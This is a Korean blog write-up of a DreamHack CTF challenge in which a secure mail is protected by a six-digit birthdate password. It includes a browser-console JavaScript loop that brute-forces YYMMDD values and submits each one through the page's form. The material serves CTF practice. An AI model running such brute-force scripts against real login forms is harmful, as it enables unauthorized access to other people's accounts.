๊ธ€ ์ž‘์„ฑ์ž: heogi

1. Description

์ค‘์š”ํ•œ ์ •๋ณด๊ฐ€ ์ ํ˜€์žˆ๋Š” ๋ณด์•ˆ ๋ฉ”์ผ์„ ๋ฐœ๊ฒฌํ•˜์˜€์Šต๋‹ˆ๋‹ค.
๋ณด์•ˆ ๋ฉ”์ผ์˜ ๋น„๋ฐ€๋ฒˆํ˜ธ๋Š” ์ƒ๋…„์›”์ผ 6์ž๋ฆฌ์ธ ๊ฒƒ์œผ๋กœ ํŒŒ์•…๋˜๋‚˜, ์ €ํฌ๋Š” ๋น„๋ฐ€๋ฒˆํ˜ธ ์ •๋ณด๋ฅผ ๊ฐ€์ง€๊ณ  ์žˆ์ง€ ์•Š์Šต๋‹ˆ๋‹ค.
๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ์•Œ์•„๋‚ด๊ณ  ๋ณด์•ˆ ๋ฉ”์ผ์„ ์ฝ์–ด ์ค‘์š”ํ•œ ์ •๋ณด๋ฅผ ์•Œ์•„๋‚ด์ฃผ์„ธ์š”!

 

2. Analysis & Attack

์ •๋‹ต์ด ์ƒ๋…„์›”์ผ ๋ฒ”์œ„๋กœ ํ•œ์ •๋˜์–ด Bruteforce ์ง„ํ–‰ํ•œ๋‹ค.

๊ฐœ๋ฐœ์ž ๋„๊ตฌ์—์„œ ์‹คํ–‰ํ•˜๋ฉด data:image/png;base64 ๋กœ ์‹œ์ž‘ํ•˜๋Š” ๋ฌธ์ž์—ด์ด ๋‚˜์˜ค๋Š”๋ฐ ๋ธŒ๋ผ์šฐ์ € ์ฃผ์†Œ์ฐฝ์— ์ž…๋ ฅํ•˜๋ฉด ํ”Œ๋ž˜๊ทธ์˜ ์‚ฌ์ง„์ด ๋‚˜์˜จ๋‹ค.

#!ex.js
var yy = "90";
var mm = "01";
var dd = "01";

while(true){
	dd = String(Number(dd) + 1);
	if(dd=="32"){
		dd="01";
		mm = String(Number(mm) + 1);
	}
	if(mm=="13"){
		mm="01";
		yy = String(Number(yy) + 1);
		console.log(yy);
	}
	if(yy=="100"){
		yy="01";
	}
	if(dd.length == 1) dd = "0" + dd;
	if(mm.length == 1) mm = "0" + mm;
	
	document.getElementById("pass").value=yy+mm+dd;
    document.getElementById("bt").click();
 }

'๐Ÿ›ก๏ธCTF > DreamHack' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

Switching Commnad  (0) 2024.01.07
Shell_Basic  (0) 2023.10.08
rev-basic-4  (0) 2023.09.28
rev-basic-3  (0) 2023.09.19
[BOB CTF 8th] - FileStroage  (0) 2022.09.13